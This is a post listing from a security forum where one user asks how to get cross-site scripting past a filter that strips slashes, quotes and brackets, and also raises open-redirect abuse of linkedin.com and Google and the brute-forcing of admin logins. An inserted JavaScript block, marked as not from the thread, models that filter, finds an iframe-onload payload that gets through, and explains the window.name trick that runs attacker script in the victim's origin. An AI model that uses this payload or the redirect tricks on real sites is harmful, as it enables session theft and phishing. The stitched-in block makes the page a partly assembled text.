sla.ckers.org is ha.ckers sla.cking
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 

2 years ago
asrail
Did anyone find out yet what hashing linkedin.com uses? Looks like some sort of security by obscurity to me. If I knew the hash, I might have an open redirect here? http://www.linkedin.com/redir/redirect?url=http%3A%2F%2Ftalent%2Elinkedin%2Ecom%2F%3Fpin%3Dtr02&urlhash=zJmW Or maybe it's a honeypot to waste "hackers'" time, and they check which sites are linked, or if javascr
Forum: Obfuscation
2 years ago
asrail
Thank you Gareth, that was awesome. I didn't think of an iframe that loads nothing and instantly triggers the onload... had to add that to my repertoire :-) Will hopefully acquire a new customer this way. You earned yourself a beer!
Forum: XSS Info
2 years ago
asrail
As you can see, in some cases the brackets {} do work and aren't filtered... It's like there is some sort of randomizer. I manage to insert a link like this: xxx?search=<a href='feed:data:x,123456'>Click</a> yields <a href=feed:data:x,123456>click<a>&ldquo; <h1> But I can't link to anything outside, because no "/"... I started some random te
Forum: XSS Info
2 years ago
asrail
Thanks, understood the location=name now - very nice. Whitespace is going through and commas too. The main issue left is how to prevent the script error in this: <script>location=name&ldquo; </h1> Maybe it's possible to use the "&" and the ";" somehow... but I have no idea so far. WHITELIST updated: a-Z 0-9 - < > . : =
Forum: XSS Info
2 years ago
asrail
<h1 id="xy"> foo bar XXXXXXXXXXXXXXXX&ldquo; </h1> I can inject at XXXXXXXXXXX. Whitelist: a-Z 0-9 - < > . : = Updated: I forgot that the "=" char is allowed, too.
Forum: XSS Info
2 years ago
asrail
Sorry, I manage to do the basic XSS stuff, but I never got that location/window.name stuff. Maybe you have a link where it's explained a little further? How would I avoid the script error because of the missing ability to close an opening <script> block? <script>location=name</script> becomes <script>location=name<script> I also cannot use HTML comments
Forum: XSS Info
2 years ago
asrail
I forgot to mention, I also don't have the brackets [] .... It's as if they read http://sla.ckers.org/forum/read.php?24,32930
Forum: XSS Info
2 years ago
asrail
The input from a GET parameter is being reflected in the HTML code. I am in the middle of HTML tags. I can inject basic HTML tags and attributes (without any type of quote) but I cannot inject any slashes. <script>alert('1:=!')</script> becomes <script>alert1:=<script> I am losing all brackets, double quotes, single quotes, exclamation marks, etc.
Forum: XSS Info
2 years ago
asrail
I am having trouble getting around a restrictive XSS filter (also being limited to exactly 70 characters). The filter removes any /,",',(,),! What goes through is <,>,=,: and normal alphanumeric characters and numbers. Anyone got an idea what I could do? Not having brackets/slashes is probably the biggest issue here.
Forum: XSS Info
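The filter described in the post above, together with the location=name idea and the "iframe that loads nothing and instantly triggers the onload" hint from the replies higher up in this list, can be modelled to check which payloads survive it. This is an added example, not code from the thread or from sla.ckers.org: the filter function, the reflection context, the candidate payloads and the names applyFilter, reflect, survives and findSurvivors are assumptions built from what the posts state (keep only the whitelisted characters, drop everything else, then cut to 70 characters; the thread does not say whether the 70-character limit applies before or after filtering, so "after" is assumed).

```javascript
// Added example, not from the thread: a model of the reflecting filter the
// posts describe, used to test candidate payloads offline.
// Assumption: only whitelisted characters are kept, the rest are dropped,
// and the result is cut to 70 characters afterwards.

// Whitelist from the thread: a-Z 0-9 - < > . : = plus whitespace and commas.
const ALLOWED = /[A-Za-z0-9\-<>.:=,\s]/;
const MAX_LEN = 70;

// Drop every character outside the whitelist (so / " ' ( ) ! [ ] { } and
// friends disappear), then enforce the length limit.
function applyFilter(input) {
  let out = "";
  for (const ch of input) {
    if (ALLOWED.test(ch)) out += ch;
  }
  return out.slice(0, MAX_LEN);
}

// The reflection context quoted in the thread:
//   <h1 id="xy"> foo bar INJECTION&ldquo; </h1>
function reflect(input) {
  return '<h1 id="xy"> foo bar ' + applyFilter(input) + "&ldquo; </h1>";
}

// A payload is usable only if the filter passes it through unchanged.
function survives(payload) {
  return applyFilter(payload) === payload;
}

// Candidate payloads (constructed for this example).
const CANDIDATES = [
  // Parens, quotes, "!" and "/" are stripped -> <script>alert1:=<script>
  "<script>alert('1:=!')</script>",
  // The closing tag loses its slash -> dangling <script>, script error
  "<script>location=name</script>",
  // Only whitelisted characters, 36 chars: an iframe without src loads
  // about:blank and fires onload at once. "window." is spelled out because
  // inside an inline handler on an iframe the bare identifier "name"
  // resolves to the iframe element's own name attribute, not window.name;
  // the whitelisted "." makes window.name expressible.
  "<iframe onload=location=window.name>",
];

function findSurvivors(candidates) {
  return candidates.filter(survives);
}

// Stand-alone run: show what each candidate turns into.
for (const c of CANDIDATES) {
  console.log(survives(c) ? "OK   " : "MANGLED ", reflect(c));
}
```

The surviving payload depends on the window.name trick referenced in the thread: an attacker-controlled page sets window.name to a javascript: URL and then navigates the same window to the vulnerable URL; window.name survives that navigation, so location=window.name in the reflected iframe handler navigates to the javascript: URL and the script runs in the victim origin. The trailing &ldquo; the site appends is harmless here because the unquoted attribute value already ended at the ">".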
6 years ago
asrail
If you want to surprise your boss, do it with your own achievements. If you don't have a clue, what will you answer if he has detailed questions? What will you do if he asks you to continue working on security/XSS related stuff? If you don't have any expertise there, you will utterly fail. You're better off reading up on XSS and trying to find out things by yourself. Just my 3 cents.
Forum: XSS Info
6 years ago
asrail
The average dumb user isn't interested in this funky thing called "URL"; he just clicks on File->Send page to send a link to a friend. Public "information page" URLs should be readable, easy to type and never change. But system "action URLs" (like adding something to a shopcart etc.) totally don't matter, since the user directly interacts with elements within the
Forum: OMG Ponies
6 years ago
asrail
row_count | row_count OFFSET offset}] Read more about it at http://dev.mysql.com/doc/refman/5.0/en/select.html TOP <numberOfFirstHits> LIMIT enables you to page through result sets by setting the start index of the first result you want to fetch and the maximum number of hits you want to retrieve. TOP only gives the first N hits - no possibility to define where to start in the resu
Forum: SQL and Code Injection
6 years ago
asrail
I can't seem to find the sources for the NoScript extension - anyone got a URL? The website http://noscript.net/ itself does not give any information about "how to contribute" aka "how to white-box test for vulnerabilities".
Forum: Projects
6 years ago
asrail
You've got to remember the different search results for different browser locales - if the user is Russian and searches Google, he probably sees other search results than the results your server gets using the Google API with a probably different locale. BTW: is the Google API key attached to some sort of locale / is it possible to set a locale upon Google API requests? You don't even need to r
Forum: Search Engine Hacking and SEO
6 years ago
asrail
rsnake Wrote:
> @asrail - as I'd stated I am not using htaccess to do authentication, I am using it to do IP filtering (go to http://ha.ckers.org/blog/wp-admin/ to see what we're talking about. You can do a lot more than just that too if you know what you're doing. Look at mod_auth_external for ideas.
Forum: News and Links
6 years ago
asrail
rsnake Wrote:
> I've htaccess protected the admin directory so no one can brute force the password.

You can still brute-force the HTTP basic authentication and afterwards brute-force the WP login. Though it takes some more time this way because you need to get over two logins.
Forum: News and Links
6 years ago
asrail
A well-known German hoster (and many others too) offers SSL for customer domains, but for some reason which I can't figure out (I don't care really) they don't just enable https://customerdomain.tld but rather use an external service that works like this: https://ssl-id.de/customerdomain.tld/ First, this is annoying because once the user switches to a part of the site that uses the SSL one, he qui
Forum: News and Links
6 years ago
asrail
I just saw in this post: http://sla.ckers.org/forum/read.php?13,16082 that .mario is already using such a Google link.
Forum: News and Links
6 years ago
asrail
I always wondered if I could abuse the Google "I feel lucky" (or whatever it's called in the English version) search mode to redirect users without them expecting it. The second button on the Google search form directly sends you to the first search result URL. Try this one for example: http://google.de/search?&q=gmail%20login&btnI= It should directly take you to the Gmail
Forum: News and Links